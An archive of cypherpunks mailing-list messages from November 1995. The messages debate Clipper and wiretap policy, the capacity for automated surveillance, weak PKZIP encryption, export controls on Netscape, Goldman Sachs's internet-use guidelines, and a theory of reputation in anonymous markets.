From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 Nov 1995 04:43:28 +0800
To: hallam@w3.org
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <9511210055.AA29106@zorch.w3.org>
Message-ID: <199511220100.UAA17883@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> >Er, Newt was the one who railed against the Exon censorship bill, and
> >who's said in public that clipper is unrealistic.
> 
> And where does that get us? Did Newt stop the Exon bill in its tracks?
> Did he do anything to stop the wiretap bill?

And what did any of the Democrats do?

Anyone who thinks that Democrats are "better" for privacy and personal
freedom than Republicans has probably been taking very high quality
drugs indeed. A Democratic president has been pushing Clipper --
Senator Exon is a Democrat.


.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 22 Nov 1995 03:48:00 +0800
To: cypherpunks@toad.com
Subject: toolkits?
Message-ID: <199511211927.UAA20586@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


|Alice here ...
|
|No, *I* am the real Alice, and I refuse to use PGP signing.
|
|Alice de 'nonymous ...
|
|
|P.S.  This post is in the public domain.
|                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.


No, *I* am the real Alice, and *I* refuse to use PGP signing.

Alice de 'nonymous ...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Wed, 22 Nov 1995 11:01:17 +0800
To: cypherpunks@toad.com
Subject: Pedophiles use encoding devices to make secret use of Internet
Message-ID: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



Story in Nando Times

http://www2.nando.net/newsroom/ntn/info/info429_4.html


      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 23 Nov 1995 09:35:26 +0800
To: cypherpunks@toad.com
Subject: Re:  "The Right To Privacy" by Caroline Kennedy, et. al.
Message-ID: <9511220155.AA28801@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I've heard a couple of media interviews (CNBC Equal Time, and NPR
Talk of the Nation).  It sounds like a good collection of issues and
scare stories.  Experienced people on this list might learn a few things
to round out the overall picture, but it's probably best for the general
public.  I hope it does real well.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 22 Nov 1995 11:38:50 +0800
To: jsw@netscape.com
Subject: Re: Spam the Sign!
Message-ID: <199511220307.VAA01713@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


[...]
>  Do you have a legal opinion to support this statement?  Our lawyers
>tell us that executives of netscape could go to jail if we make the
>128bit version of netscape available from an "export controlled"
>ftp or http server.  We are working to clarify the situation with
>the government or figure out an alternative distribution scheme that
>will remove us from the grey area.

No legal opinions here, but perhaps you give it to someone who you know is
legally entitled to have it and give them permission to redistribute it.  For
example, MIT, RSA, and c2.org already distribute export-controlled software
via FTP, so if they're willing, you could give copies to people there and
publish MD5 checksums.

>  Getting the US version of netscape widely available is one of my
>highest priorities, but I can't tell Barksdale that he should go to
>jail over it.  I'm constantly pushing from within the company to keep
>things moving forward.

It's appreciated as is your participation here.

>  In the mean time I appologize to the linux users who can't even
>buy the 128 bit version.  If something changes on this front I'll
>be sure to let people know.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 23 Nov 1995 09:51:45 +0800
To: cypherpunks@toad.com
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <199511220100.UAA17883@jekyll.piermont.com>
Message-ID: <9511220208.AA29462@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>And what did any of the Democrats do?

>Anyone who thinks that Democrats are "better" for privacy and personal
>freedom than Republicans has probably been taking very high quality
>drugs indeed. A Democratic president has been pushing Clipper --
>Senator Exon is a Democrat.

Yes and Coates is a Republican, Meanwhile Grassley and Dole have a parallel set 
of lossage. Incidentaly on the Exon-Coates ammendment, look into the connections 
between Rimm and the Christian right. The legal footnotes were apparently 
drafted by legal council for the Christian Coalition. Granted there are few 
friends of the Christian Right's manifesto on the Internet, I personally 
consider them an entryist group which the Republicans should recognise as a 
liability. 

The point was that the original post made the assumption that the Republicans 
were somehow differentiated from the Democrats on this. Its simply not true. 
Clipper was started under Bush (or possibly Regan) and Clinton carried it over 
without change. I don't see any sign at present that a Republican president 
wouldn't simply continue as well.

The only way something is going to get done is if the Clipper program gets 
labeled with the "take out with the trash" tag. Essentially there are always a 
whole series of civil service initiatives that continue from administration to 
administration that everybody knows are looser ideas but it is easier to 
continue with them than give the opposition an opportunity to claim that it was 
a retreat. It sounds (and is) a stupid way to do politics but that is the way it 
works. For some reason the american people consider stopping a bad policy to be 
a "flip-flop" and hence something which demonstrates the unfitness of the office 
holder, just as willingness to negotiate is "vacillation". 

Its not a new principle. Clinton axed a whole raft of programs that the Bush 
adminstration had realised were losers but had continued for the same reason.

What you have to avoid here is making the issue one of party politics. First off 
you will lose because you will bet on the losing side at least half the time. 
Secondly policies that get into the party political arena end up being treated 
in an absolutist and ideological manner which prevents any common sense input. 
You are likely to find both sides taking positions you don't like simply because 
it is advantageous politically.

Secondly you are likely to win the argumkent in the Congress and then lose it in 
the Whitehouse. The next administration will be either Dole or Clinton, more 
likely Clinton because Dole is a fossil and the next election will not be about 
the second world war or the cold war, it will be about responding to new 
technology. Neither Dole nor Clinton is likely to respond well to a mandate from 
congress concerning issues of national security. That is the card the FBI will 
play. The NSA have their own card but none of us know what their real concern 
is.

What I am saying is that we must not allow the Congress to attempt to beat up 
the Whitehouse. They simply do not have leverage on this issue. No President 
will overule the experts on a matter of National security lightly, if it is a 
partisan congressional mandate it will be much easier to reject.


A much better strategy is to portray the FBI as being a rogue agency acting 
outside their brief. The debate must be turned from a simple question of privacy 
versus national security which you will lose regardless of which party is in 
power to one of ecconomic security versus short term national security. You need 
to point out the ecconomic cost of insecure communications. You have to bring to 
light the behaviour of the French for example. Make it clear that US companies 
are loosing business because the French regularly tap fax communications.
Make it clear that encryption is essential to provide high grade protection 
against hackers.


The privacy issue may be what drives cypherpunks but it is not the argument 
which will work in the arena you need to be heard in. They do not care about 
privacy, most particularly not protection against government intrusion. They are 
not even that concerned about protecting individuals privacy against corporate 
abuse.

If you make it a party issue you will not only lose but risk turning the clock 
the other way. At the moment everyone knows that the export control laws are not 
stopping people from getting PGP. It is not a good idea to rub peoples noses in 
it. It is easy to ignore export violations by turning a blind eye. It is 
difficult to turn a blind eye when people are so anxious to announce what is 
going on. Phil Z. is not having problems because he wrote PGP, he is having 
problems because he made sure the FBI couldn't pretend they did not know what 
was going on.

If you make encryption a party issue then one of those Grassley bills will pass 
and the President in power may not veto it.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 Nov 1995 09:48:11 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <acd75bfd090210044420@[205.199.118.202]>
Message-ID: <199511220216.VAA18082@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 4:05 PM 11/21/95, Peter Wayner wrote:
> >Has anyone ever done the math on the FBI's new wire tapping
> >proposals and determined whether they'll have enough agents to
> >do all of the listening?> ...
> 
> The manpower shortage can be solved by moving the listening step offshore,
> perhaps to one of the Carribbean islands that processes credit card slips.

Am I the only person who thought that the point was to be able to
selectively target certain areas but not necessarily all areas? For
instance, lets say the known criminal Tim May is going to be in some
place for a while -- by conducting roving taps of all conversations, I
can find him. 1% capacity should be enough to make that practical. As
another example, lets say there is some sort of political insurgency
building up in some city -- presumably, one could devote all one's
roving manpower to just that place for a few weeks and crush it.

I can see no conventionally legitimate need or way to exploit the
capability, but with unconventional and illegitimate techinques...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 23 Nov 1995 02:30:41 +0800
To: ethridge@Onramp.NET (Allen B. Ethridge)
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130500acd7e7228be6@[199.1.154.51]>
Message-ID: <199511220222.VAA00560@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The FBI's "requirements" present an entertaining set of logistical
> problems.  Simply equipping the switches to handle the extra capacity,
> especially during busy hour, is problematic.

The sources I consulted were nowhere near as restrained.
"Out of their trees" was the most concise reply I heard.
And *this* was from someone WORKING in the FI community
in technical areas.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 22 Nov 1995 10:55:41 +0800
To: "L. DEkel" <dekel@carmel.haifa.ac.il>
Subject: Re: PKZIP - Encryption
In-Reply-To: <Pine.A32.3.91.951122035639.51855A-100000@carmel.haifa.ac.il>
Message-ID: <199511220223.VAA18118@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"L. DEkel" writes:
> PKZIP Encryption:
> 
> PKZIP encryption is often said to be: Weak, "a joke" ,"a deception" etc.
> Maybe it's time to put things in the right perspective.
> 
> One must realize (yet again) the difference between:
> Theoretical Cryptography - and - Practical Cryptography:

Er, I don't understand.

I could see why one would want to use a weak encryption system if it
bought you something. However, good encryption systems are as cheap to
use as bad ones. Therefore, why ever use a bad one? If the top of the
line lock costs the same amount as a toy lock, why buy a toy?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 22 Nov 1995 05:39:27 +0800
To: pcw@access.digex.net
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <199511212053.VAA02472@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> For instance, if 1% of America is on the phone during the peak
> hours of the day, then that puts 2.5 million Americans on the
> phone or 1.25 million conversations. If the FBI wants access to
> 1% of that, that is still 12,500 simulataneous conversations.
> That would seem to imply 12,500 people to listen to the tapes,
> right? Would that take agents off the streets?

On the other hand, if you only want to collect rough background
information about people who might become significant later, it is
enough to store the conversations in a computer (storage is orders of
magnitude cheaper than the man-time to listen to the tapes), and only
listen the tapes if the person becomes interesting.

Besides, computer technology is approaching the point where you can
eliminate the human from the link entirely, except for final
verification.

1. Speech recognition already works quite well.  There was an article
about a 20.000 word speaker-independent system a few years ago,
operating 1/7th of real time on an alpha workstation.

2. Automatic speaker recognition from voice works quite well if my
understanding is correct.  (Useful for picking up interesting
conversations for futher analysis when you get them from sources you
don't normally monitor).

3. Computers have been able to pick up potentially interesting
conversations by keywords for decades.  Also useful for picking up
interesting conversations for further analysis from sources you don't
monitor very actively.  (Of course, you can additionally use phone
numbers, mobile phone *phone* identification codes, etc.)

4. A lot of work is being done in classifying transcript based on
their content, on message understanding.  In other words, lot of the
analysis work can be automated now or in near future.  The computer
can then answer questions from the data and for example select
individuals for futher analysis based on complex criteria.

5. A lot of work is being done on data mining (i.e., finding new data
from small pieces of individual data in a database, such as purchase
logs, etc.).  This is one of the hot topics in database conferences
right now.

6. Research is being done in massive databases.  There was an
Intelligence Community research initiative a couple of years ago on
massive databases; if my memory serves me right, they were talking
about 2-3 *petabytes* (10^12) as the size of the final database (no,
it was not gigabytes and it was not terabytes).  I believe I still
have the announcement saved somewhere if somebody wants it.


All of these technologies are feasible now or in near future.

Then add a little spices: the hundreds of thousands of surveillance TV
cameras around (did you know that there is a computer system that can
recognize and look up 25 faces per second from a database of a million
faces - used to control football huligans and shoplifters for
instance, but has other uses as well), car movement records from
highway payment systems, purchase records obtained from
credit card companies, banks and retail chains, link up to medical
records, tax databases, employment records, etc.  Add full knowledge
of flight and other travel reservations, some fax, e-mail and telegram
intercepts.

Now, what have you got (besides effective tools for finding criminals)?

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 Nov 1995 09:36:51 +0800
To: Weld Pond <weld@l0pht.com>
Subject: Re: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
Message-ID: <199511220307.WAA18256@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Weld Pond writes:
> [ Pedophiles use encoding devices to make secret use of Internet ]
> Story in Nando Times
> 
> http://www2.nando.net/newsroom/ntn/info/info429_4.html

Somewhat inevitable. Doubtless it will be used by the FBI and others
as ammo.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 22 Nov 1995 13:23:12 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <199511210731.XAA08374@jobe.shell.portal.com>
Message-ID: <yo9XeD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice de Nonymous writes:
[dlv]
> > Fred is right. I used to work for Goldman Sachs & their internet usage
> > policy stated that when you write to Internet or Usenet from a GS account,
> > it will reflect on the firm no matter how you disclaim it.

[alice]
> I think this is true, and is where we start to get into reputations and
> trust.
>
> If someone from Goldman Sachs posts to a Usenet group discussing abortion
> or gun-control, and says that: "These opinions are my own and not my
> employers."  Then, we can accept that, no matter how silly their opinions
> are.

Unfortunately, most employers won't accept this. A couple of years ago Sun
Micro fired Philip Stromer for posting homophobic jokes to Usenet. A good
friend of mine was fired from Microsoft for sending politically incorrect
articles to a Ukrainian mailing list. (He was born in Ukraine.) Someone
complained to MS and he was axed. Interestingly, most of his offensive messages
came from his CompuServe account; only a couple of tamer ones were from his
microsoft.com address. The complainer and Microsoft apparently felt that since
he was known to work for Microsoft, it didn't matter that he posted mostly from
Compuserve.

I think Goldman's policy on Internet use is pretty reasonable. I'm attaching
at the end a couple of interesting e-mails that explain their philosophy.

> But there is a difference in the way we look at it if someone from Goldman
> Sachs posts to misc.invest.stocks instead and says that the Goldman Sachs
> Strip Coupon Fund is better than the one from Merrill Lynch -- that it's
> safer and produces higher returns because Goldman uses cubic spline
> interpolation methodologies to interpolate the yield curve, while Merrill
> Lynch doesn't.  There is a difference here.

Hmm... If it looks remotely like marketing, it'd better carry the usual
disclaimers that past returns are no indication of future returns etc. :)

> In the first case, the poster is not commenting about anything to do with
> their work, -- it really is just one man's opinion -- while in the second
> they are actually commenting upon something their employer is selling.

Even in the first case, the poster is using a Goldman e-mail address, which is
comparable to using Goldman stationery to write a personal letter. If he says
something pro- or anti-gun/abortion that might antagonize a potential client
and cause him not to do business with GS, then GS is right not to like this.

> If the employee tries to add, "these opinions are my own, and do not
> reflect the opinion of my employer" then we have a huge credibility
> problem.

I think these disclaimers are just silly and can't be taken seriously.
If he posted an article to alt.sex.pedophile discussing his desire to have
sex with children, surely this would reflect on Goldman no matter how he
disclaimed it, and he would deservedly be in trouble.

> You really can't have it both ways.  You can't post officially and
> unofficially at the same time, unless it really does have nothing to do
> with your work.

Goldman's policy seems to indicate that if you post from a commercial
ISP and don't claim to speak on behalf of Goldman, they don't care what
they say. This is better than some...

But consider this hypo. Joe Shmoe, an analyst with GS Research, posts an
article to misc.invest.* saying that he likes stock XYZZY. He posts from
another ISP and doesn't mention that he works for Goldman. But one of the many
kooks that invest misc.invest.* recognized Joe and shouts: *LOOK! THIS IS JOE
SHMOE FROM GS RESEARCH! *. At which point, the readers take Joe Shmoe's
postings much more seriously, and Goldman asks him whether he's put XYZZY on
the restricted list. (Disclaimer: I definitely don't speak for Goldman and am
just supposing what might happen in a situation like this :)

> If you post from Sun Engineering, and you are posting to a group that
> focuses on Sun, and you are talking about a Sun product, then people are
> going to take your comments as an official statement from Sun. You are
> that product's spokesperson, whether you disclaim or not, and should act
> accordingly.  No matter what, that's the way people are going to see it.

I would venture as far as to say that if you post from Netcom, but are known to
work for X, then you have much more crediblity speaking about X's products or
future plans that some unknown person. Your reputation is thus both enhanced by
X and partially owned by X. X would be within its right to ask you not to speak
about X's affairs in public. The readers would have the right to assume that
you know more about X's affairs and deicision-making than someone from the
street. Greater credibility carries with it greater responsibility, both to X
and to the readers. If you want a reputation that's independent from X, you
could get an ISP account under an assumed name, or post via an anonymous
remailer, and build a reputation from scratch.

Here are a couple of quotes regarding Goldman's Internet usage guidelines:

-----------------------------------------------------------------------------
Date: Wed, 10 May 1995 12:35:49 -0400
Resent-From: dimitry.vulis@nyapps01.gsam.gs.com (DLV)
From: Gary Schermerhorn <gary.schermerhorn@nyapps01.gsam.gs.com>
Subject: Internet GuideLines
To: gsamit@athena.fi.gs.com
Message-Id: <199505101635.MAA27299@nyapps01.gsam.gs.com>
Mime-Version: 1.0
X-Mailer: Z-Mail (3.2.0 06sep94)
X-Mailer: Mozilla/0.96 Beta (Windows)
Content-Type: text/plain;  charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Many of you have asked me for the firm's Internet Guidelines.  I have
attached them below.  Call me or Hans if you have any questions.

> [Image] Internet Access (including Internet mail)
>
>     ------------------------------------------------------------------------
>
> The Firm has clear policies on the appropriate usage of computer
> resources listed in a pamphlet entitled "The Keys To Information
> Security". This pamphlet is distributed to all new employees during
> their New Employee Orientation on the first day of employment. The
> policy in part:
>
>      Goldman Sachs' computers and software should be used for
>      business purposes only. Software and data created on Firm
>      systems or by Firm employees are the property of Goldman
>      Sachs. Only authorized use of the systems is permitted.
>
> You should be aware that unauthorized use of the systems may result in
> disciplinary action by the Firm, possibly including termination.
>
>     ------------------------------------------------------------------------
>
> Q: What does "for business purposes only" mean?
>
> A: It means that except for de minimis personal use, you should only
> use the Internet (including Mosaic and Internet mail) for tasks
> related to your job function.
>
>     ------------------------------------------------------------------------
>
> Q: Does this mean I cannot browse the Internet unless I know what I'm
> retrieving?
>
> A: The Internet is a resource beyond comprehension; even some of the
> Firm's veteran Internet surfers do not know about most of it. Browsing
> the Internet while looking for business-related resources is
> acceptable. Browsing the Internet with the intent of looking for
> non-business-related resources (such as the latest copy of Tetris) is
> not acceptable. Using the Internet to retrieve recreational pictures
> and other non-business items is not acceptable.
>
>     ------------------------------------------------------------------------
>
> Q: What if I have an Internet application I want to use that isn't
> currently supported?
>
> A: Consult with the Information Security group (unix@is.gs.com).
>
>     ------------------------------------------------------------------------
>
> Q: How does anyone know what I look at on the Internet?
>
> A: All Internet services leave an audit trail which is kept by the
> Information Security group. This logfile can be requested by your
> manager.
>
>     ------------------------------------------------------------------------
>
> Q: Why is the Firm concerned about Internet access?
>
> A: There is a charge to the Firm for the Internet use time. Other than
> de minimis personal use, non-business use constitutes theft of Firm
> property.
>
> In addition, many Internet applications (especially Mosaic) can
> potentially consume large amounts of network bandwidth. This has a
> significant impact upon your environment and can consume limited
> shared resources such as bandwidth and CPU. Heavy recreational usage
> of Internet services could consume bandwidth needed to deliver
> critical business data.
>
> Furthermore, certain accessed materials such as sexually-oriented
> materials may be offensive to others whom it is visible.
>
> Finally, when you send mail or news out to the Internet from a Firm
> system, you not only leave a trail throughout the Internet with the
> Goldman's name on it, but you also provide people on the Internet with
> an impression of Goldman, regardless of how you disclaim it. Plainly
> put, do not use the Internet (including email and news) for
> non-business related work.
>
>     ------------------------------------------------------------------------
>
> Q: How does this apply to Internet mail?
>
> A: Internet mail follows the same guidelines as Internet connections.
> You should not use Internet mail for purpose not related to your job
> function. One example of an appropriate usage would be for a system
> administrator to use a mailing list to learn more about a particular
> software package, such as Kerberos.
>
> An inappropriate use would be if you joined a list of bicyclists in
> the area and had that mail sent to your email account at work. Such
> mail is not related to your job-function (unless you happen to be the
> Goldman Investment Research Analyst assigned to bicyclists on the
> Information Superhighway).
>
>     ------------------------------------------------------------------------
>
> Q: So is it okay to correspond with clients through Internet mail?
>
> A: Communicating with clients is carefully controlled by the
> Compliance people in for your business unit. You should obtain the
> same internal approvals when sending email to clients over the
> Internet as you get when sending paper mail to them. If you have any
> questions, check with your Compliance person first; do not send email
> to a client with the intention of resolving these issues later.
>
>     ------------------------------------------------------------------------
>
> Q: What about Usenet news and mailing lists?
>
> A: When you post to Usenet news or send mail to a mailing list, you
> are providing an impression to the world of Goldman. Even if you
> "disclaim" what you are saying as "only your opinions", anything you
> say will continue to reflect on the Firm. Do not use news and mailing
> lists for personal or non-business purposes.
>
>     ------------------------------------------------------------------------
>
> Q: I really want to play with the Internet without all these
> constraints, what should I do?
>
> A: There are dozens of business that provide personal connections to
> the Internet for a very low cost (between $10 and $30 / month). If you
> want to explore the Internet, purchase a membership for one of the
> these services and explore the Internet on your own time, without
> using Firm computers or networks.
>
>     ------------------------------------------------------------------------
>
> Q: Where should I go if I have more questions?
>
> A: Your supervisor can help you determine what Internet resources may
> or may not be related to your job function.
>
>     ------------------------------------------------------------------------
>
> Unix Information Security Staff / webmaster@is.gs.com


-----------------------------------------------------------------------------
Date: Mon, 08 May 1995 12:09:27 -0400
From: Gary Schermerhorn <gary.schermerhorn@nyapps01.gsam.gs.com>
Subject: Internet Usage
To: gsam.all@athena.fi.gs.com
Message-Id: <9505081209.ZM11783@itpc01>
Mime-Version: 1.0
X-Mailer: ZM-Win (3.2.1 11Sep94)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7BIT

Just a reminder about Internet usage policy; Please read the 'Internet Access
Policy' statement, which is available on the GSAM Home page, or email me and I
will send you a copy.

ALL World Wide Web accesses are monitored against a list of known servers and
keywords which are understood to be inappropriate.  This list is available to me
each month.  You should all avoid Web access that will end up on this list.
Inappropiate use of the Web is equivalent to inappropriate phone usage (e.g.,
900 numbers).

Please read the Internet Access Guidelines.  Encourage your staff, particularly
new staff, to read them also.  The spirit of the guidelines is very clear.
Thanks.

--
Gary Schermerhorn                  (scherg@gsam.gs.com)
Goldman Sachs Asset Management
(212) 902-3344 (phone)
(212) 902-1384 (fax)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 22 Nov 1995 14:31:03 +0800
To: cypherpunks@toad.com
Subject: Re: PKZIP - Encryption
In-Reply-To: <Pine.A32.3.91.951122064257.46049A-100000@carmel.haifa.ac.il>
Message-ID: <199511220607.XAA12915@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



L. DEkel writes:

>
>     "Perry E. Metzger" writes:
> > I could see why one would want to use a weak encryption system if it
> > bought you something. However, good encryption systems are as cheap to
> > use as bad ones. Therefore, why ever use a bad one? If the top of the
> > line lock costs the same amount as a toy lock, why buy a toy?
> 
> There is the question of convenience (security=1/convenience - postulate),
> people don't like to pass their plaintext through several utils, where one
> compresses it, the other encrypts etc., they want a convenient util to use.

I think the point is that the postulate is true only because the people
who write "convenient" software usually either don't have a proper clue
about security or are afraid of crossing ITAR. Secure encryption algorithms
are intrinsically no less convenient than insecure ones. Quite the opposite,
from what I've seen: secure algorithms tend toward simplicity, because
it's easier to prove theorems with a simple algorithm than with a 
convoluted one. RC4 is a fine example of this, astonishingly uncomplicated.

It's as easy to drop IDEA into a compression/archiving utility as it is
to put in the dreaded "proprietary" algorithm. Easier. And if you don't want
to pay the licensing fees, use Blowfish or 3-DES. Why these companies don't
is a anybody's guess. Take the example of StuffIt on the Mac, which
started out with DES and moved to some internally produced algorithm for
reasons no one at Aladdin has been willing to explain to me, even when
I asked with relative bluntness. Evidently, it was worth some trouble to
them to _reduce_ their security, of all things. That is a sad, sad 
situation. 

(No particular flame on Aladdin, other than the obvious technical one. They're
a fine bunch of folks, from my experience.)


                                  -- Will






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 22 Nov 1995 20:41:12 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: towards a theory of reputation
In-Reply-To: <199511212332.PAA24563@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995, Hal wrote:

> This is an interesting approach.  However this seems to fold in issues of
> reliability with issues of quality and value.  If I have a choice of two
> vendors, one of whom produces a product which is twice as good, but there
> is a 50% chance that he will abscond with my money, I am not sure how to
> value him compared with the other.  It seems like the thrust of the
> analysis later is to determine whether people will in fact try to
> disappear.  But that is not well captured IMO by an analysis which just
> ranks people in terms of "utility" for the price.

Our intuitive notion of reputation combines the issues of reliability and
quality.  In your example, whether you choose the reliable vendor or the
unreliable one depends on whether you are risk-seeking or risk-averse. 
You must prefer one or the other or be indifferent.  In general how you
make these choices depend on your values and your expectations of what the
vendors will do, which include both expectations of reliability and 
expectations of quality.

Can you elaborate more on why the analysis is inadequate?  (I know it 
probably isn't adequate, but why do you think so?)

> I am not sure about this last point.  It seems to me that a good
> reputation is one which is most cost-effective for its owner.  Whether it
> is good for social stability is not relevant to the person who is
> deciding whether to use it.  ("But what if everyone behaved that way?
> How would you feel then?")  It may be nice for the analyst but not for
> the participant.

Right, I'm speaking from the point of view of the analyst when I say
"good", but it also applies to individual participants.  Each person does
what he thinks is in his best interest, but if this turns out to be
unstable for the reputation system as a whole, then it won't last very
long so there is little point in getting involved in the first place.  In
other word, I would not choose to participate in an unstable reputation
system. 

> I don't really know what the first one means.  There are a lot of
> different ways I can behave, which will have impact on my reputation, but
> also on my productivity, income, etc.  There are other ways I can damage
> my reputation than by cheating, too.  I can be sloppy or careless or just
> not work very hard.  So the first two are really part of a continuum of
> various strategies I may apply in life.  The second is pretty clear but
> the first seems to cover too wide a range to give it a value.

You are right that there is continuum of strategies, but I assume there is
a discontinuity between completely throwing away your reputation and any
other strategy.  So operating value is the maximum amount of profit you
can make by optimizing among all other strategies except disappearing. 

> It would be useful to make some of the assumptions a bit clearer here.
> Is this a system in which cheating is unpunishable other than by loss of
> reputation, our classic anonymous marketplace?  Even if so, there may be
> other considerations.  For example, cheating may have costs, such as
> timing the various frauds so that people don't find out and extricate
> themselves from vulnerable situations before they can get stung.  Also,
> as has been suggested here in the past, people may structure their
> interactions so that vulnerabilities to cheating are minimized, reducing
> the possible profits from that strategy.

When I wrote the original post I was thinking of the classic anonymous 
marketplace.  But I think it can apply to other types of markets.  
Cheating costs can be easily factored into the throw-away value, and 
an important question for any theory of reputation to answer is how 
to structure transactions to minimize this value.  Many more assumptions 
need to be made in modeling a particular reputation system, but I was 
trying to list some general properties that might apply to all reputation 
systems.

> It might be interesting to do something similar to Axelrod's Evolution
> of Cooperation, where (human-written) programs played the Prisoner's
> Dilemma against each other.  In that game, programs had reputations in
> a sense, in that each program when it interacted with another
> remembered all their previous interactions, and chose its behavior
> accordingly.  The PD is such a cut-throat game that it apparently
> didn't prove useful to try to create an elaborate reputation-updating
> model (at least in the first tournaments; I understand that in later
> versions some programs with slightly non-trivial complexity did well).

The tit-for-tat program that won both contests uses an extremely simple 
reputation algorithm -- it expects the next action of the other player 
to be the same as the last action.  This is an example of what I called a 
"good" reputation algorithm.  It serves the self-interest of the entities
that use it; it is cheap to use; when widely used the system is stable.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 22 Nov 1995 16:41:31 +0800
To: "James A. Donald" <wjhalv1@PacBell.COM>
Subject: Re: towards a theory of reputation
In-Reply-To: <199511220523.VAA28300@blob.best.net>
Message-ID: <Pine.SUN.3.91.951121234629.2539B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 Nov 1995, James A. Donald wrote:

> Any attempt to discuss and analyze reputations using
> morally neutral language is bound to wind up as boring long
> winded meaningless complicated word salad.

I don't understand what you mean by this.  Can you give an example to how 
to discuss reputation (i.e., the concept of reputation, not a particular 
reputation) using morally non-neutral language?

William J. Halverson wrote:

> What is the differnece between 'reputation' and 'value'?

When we say the value of some object, we implicitely assume that the 
quality of the information we used to evaluate the object is good enough 
that we don't have to deal with uncertainty.  When we speak of reputation 
however, we explicitely assume that we have less than perfect information 
and that uncertainties must be dealt with.  We normally speak of value of 
objects and reputation of entities, because information about objects are 
usually easier to obtain than information about entities.

> Why quantify it?  If Bob's advertising/testimonials are successful,
> he may not even have a 'reputation' because only insiders know
> about him.

Quantification is an abstraction that sometimes allows one to think about 
a concept more clearly.  You decide whether this is the case for 
reputation.

I don't completely understand your second sentence.  Only people who know 
that Bob exists has a reputation of him, so if only insiders know he 
exists, his reputation consists of the insiders' reputations of him.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 23 Nov 1995 07:58:12 +0800
To: cypherpunks@toad.com
